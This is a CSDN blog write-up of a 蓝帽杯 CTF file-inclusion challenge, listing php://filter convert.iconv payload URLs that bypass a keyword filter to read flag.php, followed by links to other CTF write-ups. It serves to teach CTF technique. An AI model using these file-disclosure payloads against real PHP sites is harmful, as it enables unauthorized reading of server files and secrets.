第四届蓝帽杯文件包含题writeup

最新推荐文章于 2023-07-22 14:06:09 发布
最新推荐文章于 2023-07-22 14:06:09 发布
阅读量356 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lms29355/article/details/126512978
版权

  1. 访问页面,查看源码

这里我们可以看出可以结合php://filter结合文件包含来读取文件

 

  1. 使用base64读取
http://ip:port/index.php?filename=php://filter/read=convert.base64-encode/resource=/flag

 

  1. 使用 String Filters

得到同样的 do not hack!的结果

  1. 使用 Conversion Filters

尝试使用以下过滤器,都不行

  • convert.base64
  • convert.quoted

使用 convert.iconv.[]过滤器,[]中支持以下字符编码(* 表示该编码也可以在正则表达式中使用)

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
...
\\具体支持的编码可见php官方文档
\\https://www.php.net/manual/zh/mbstring.supported-encodings.php

分别进行尝试

payload:
http://127.0.0.1:32771/index.php?filename=php://filter//convert.iconv.UCS-4*/resource=/var/www/html/flag.php

payload:
http://127.0.0.1:32771/index.php?filename=php://filter//convert.iconv.UCS-4BE/resource=/var/www/html/flag.php

payload:
http://127.0.0.1:32771/index.php?filename=php://filter//convert.iconv.UCS-4LE*/resource=/var/www/html/flag.php

…(依次尝试)

最后可以发现,UCS-4*是没有报出错误信息的

那么结合其他编码方式即可读出flag.php文件

payload:
http://127.0.0.1:32771/index.php?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=/var/www/html/flag.php

http://192.168.36.132:49153/?filename=php://filter//convert.iconv.UTF-7.UCS-4*/resource=/var/www/html/flag.php

http://192.168.36.132:49153/?filename=php://filter//convert.iconv.EUC-JP*.UCS-4*/resource=/var/www/html/flag.php

sqlnono
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
蓝帽杯one_Pointer_php writeup
05-10
蓝帽杯one_Pointer_php writeup
2021蓝帽杯决赛wp
onl_llo的博客
08-30 1235
2021蓝帽杯决赛wp pwn secretcode 程序分析 只允许open和read read的fd >= 0x14 shellcode的限制: 不能有00, 会被strcpy截断 调⽤shellcode时, rax r10执⾏shellcode 思路: 侧信道泄露flag 先多次open让flag对应的fd为0x14 然后read读⼊⽂件内容到rsp处 爆破[rsp+idx]处的字符, 如果为C, 则死循环, 否则就触发⼀个SIGV 细节: 构造"flag": mov eax, "fl
蓝帽杯2022年半决赛 writeup(附取证目+解压密码+附件)
mumuzi的博客
08-05 8513
CTF-MISC取证专项练习(更新ing)
qq_52820087的博客
10-13 2455
CTF-MISC取证专项练习
2022蓝帽杯初赛
cppuHsir的博客
07-22 438
2022蓝帽杯初赛
2022-第六届”蓝帽杯“全国大学生网络安全技能大赛 wp(WriteUp)
一位热爱网安的年轻人的博客
07-10 883
第六届”蓝帽杯“全国大学生网络安全技能大赛 wp
2020 蓝帽杯线下赛PWN WriteUp .pdf
09-05
本文主要涉及的是网络安全领域的Pwn(利用漏洞攻防)技术,具体是针对2020年蓝帽杯线下赛中的一个Pwn目进行的WriteUp(解报告)。Pwn类目通常涉及到缓冲区溢出、格式字符串漏洞、整数溢出等,目标是通过编写...
中国民航大学第四届“西普杯”信息安全竞赛-目源程序和Writeup.zip
10-23
中国民航大学第四届“西普杯”信息安全竞赛-目源程序和Writeup.zip
中国民航大学第四届“西普杯”信息安全竞赛 - 目源程序和Writeup.zip
最新发布
01-14
大学生参加学科竞赛有着诸多好处,不仅有助于个人综合素质的提升,还能为未来职业发展奠定良好基础。以下是一些分析: 首先,学科竞赛是提高专业知识和技能水平的有效途径。通过参与竞赛,学生不仅能够深入学习相关...
2022第六届蓝帽杯部分
m0_63525319的博客
10-24 371
主要讲述了本团队做出来的目,如果有错误,大家多多指教
CTF one_Pointer_php 2021 蓝帽杯 WriteUp
baynk的博客
05-10 1214
两周前做的,弄了一会没时间就放下了,我当时以为我差一点,结果真的差亿点。。。 今天在BUUCTF中看到了这个的复现,特来学习一波。 0x01 PHP审计 之前看到人家发的是张火炬,这次打开却是个广告了。。不过无所谓,给了源代码就成,分别是user.php和add_api.php。 ### user.php <?php class User{ public $count; } ?> ### add_api.php <?php include "user.php"; if($use
第四届蓝帽杯”全国大学生网络安全 技能大赛 Writeup
algae
08-08 5499
第四届蓝帽杯”全国大学生网络安全 技能大赛 WriteupMisc签到sudo熟悉的解密Web文件包含绕过easiestSQLiSoitgoesInclusionCryptozuc Misc 签到 观色 010editor查看,发现文件头是GIF89a,是gif文件 Stegsolve 调色道,出现前半flag ps打开,分离两个图层 Stegsolve分析,得到后半flag,即可得到完整flag sudo 喜欢玩数独吗,一起来玩吧。 nc 47.93.204.245 12000 1-9数字玩99
[蓝帽杯2020第四届 线上赛]文件包含绕过
qq_43801002的博客
08-08 892
目 过程 ######阴间做 纯脑洞,就看谁能搜的到。 1.文件包含php伪协议 2.需要读php文件,以前觉得:后端语言没法直接显示到前端,必须用base64转码 是我浅薄了 Example #3 convert.iconv.* <?php $fp = fopen('php://output', 'w'); stream_filter_append($fp, 'convert.iconv.utf-16le.utf-8'); fwrite($fp, "This is a test.n");
绕过disable_functions
unexpectedthing的博客
04-28 2275
文章目录前言黑名单绕过利用 LD_PRELOAD 环境变量LD_PRELOAD 简介利用条件劫持 getuid()劫持启动进程演示过程利用ShellShock(CVE-2014-6271)使用条件:原理简述演示过程php-json-bypass使用条件:原理简述利用脚本演示过程php-GC-bypass使用条件:原理简述利用脚本演示过程利用 Backtrace使用条件:原理简述利用脚本利用方法利用 Apache Mod CGI使用条件:原理简述演示过程2020De1CTF通过攻击 PHP-FPM理论:ctf
2021第四届红帽杯网络安全大赛-线上赛Writeup
热门推荐
末初的CSDN博客
05-10 1万+
文章目录MISC签到colorful codeWEBfind_itframeworkWebsiteMangerezlight 记录一下被锤爆的一天…orz MISC 签到 签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。 附件名称叫EBCDIC.zip 010Editor直接选择EBCDIC编码 flag{we1c0me_t0_redhat2021} colorful code WEB find_it 目录扫描发现robots.txt 存在1ndexx.php,直接访问并
蓝帽杯2021初赛 writeup+赛后复现(misc123+pwn2+web1)
mumuzi的博客
04-30 5161
蓝帽越来越离谱 争分夺秒,101分排到前70 Ball_sigin + slient + 冬奥会_is_coming + 复现I_will_but_not_quite + 嫌疑人x的硬盘整理(未完全复现) 1.web:Ball_sigin 纯玩游戏,会出现3个单词缺一个字母,分别吃到对应字母即可出flag 2.PWN:slient 既然是原,就可以直接算杂项了吧(雾 直接参考这个:https://www.lintstar.top/2020/12/784edd2e的slient,改掉端口和ip即可,fla
第四届全国网络空间安全技术大赛部分 Writeup
柠檬木有枝
10-21 1459
Web1 首先是一个登录注册界面,注册登录进去后提示 flag 在 flag.php。 访问 flag.php 提示 admin can get the flag 发现一个修改密码的页面 change_passwd.php ,根据 cookie 中的 user 确定修改密码的用户,造成任意密码修改漏洞(大佬们还写了脚本更改 admin的密码,这道还是一个拼手速的游戏
第四届红帽杯网络安全大赛 Web 部分writeup
feng的博客
05-09 9952
前言 记录一下web的wp,随手写的,只会前三,确实都很简单。 find_it 扫到robots.txt,发现1ndexx.php,直接访问不了,访问.1ndexx.php.swp得到源码,然后读flag: ?code=<?= show_source(glob('./*')[2]); 再访问hack.php: base32解密一下即可得到flag。 framework 是个yii2的框架,扫出来www.zip下载源码,找到了反序列化的路由,yii2的反序列化之前审过了,直接拿POC打: &lt
蓝帽杯全国大学生网络安全技能大赛
08-24
蓝帽杯全国大学生网络安全技能大赛是一项面向全国大学生的网络安全竞赛。该比赛旨在提升大学生的网络安全技能和意识,促进网络安全人才的培养。比赛内容涵盖了各个领域的网络安全知识和技能,包括但不限于电子取证、加密通道、Web安全等方面。 该比赛提供了一系列赛和附件,选手需要根据目要求进行解答和实践。例如,电子取证中,选手需要完成对手机取证的任务,通过分析附件中的数据和信息来获取所需的证据[2]。还有其他赛如加密的通道和Web安全等,选手需要运用相关的知识和技能来解决问蓝帽杯全国大学生网络安全技能大赛为大学生提供了锻炼和展示自己网络安全能力的平台,也为培养网络安全人才作出了积极的贡献。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)](https://blog.csdn.net/ZXW_NUDT/article/details/126173643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [[ CTF ]天机战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(初赛)](https://blog.csdn.net/ZXW_NUDT/article/details/125715546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值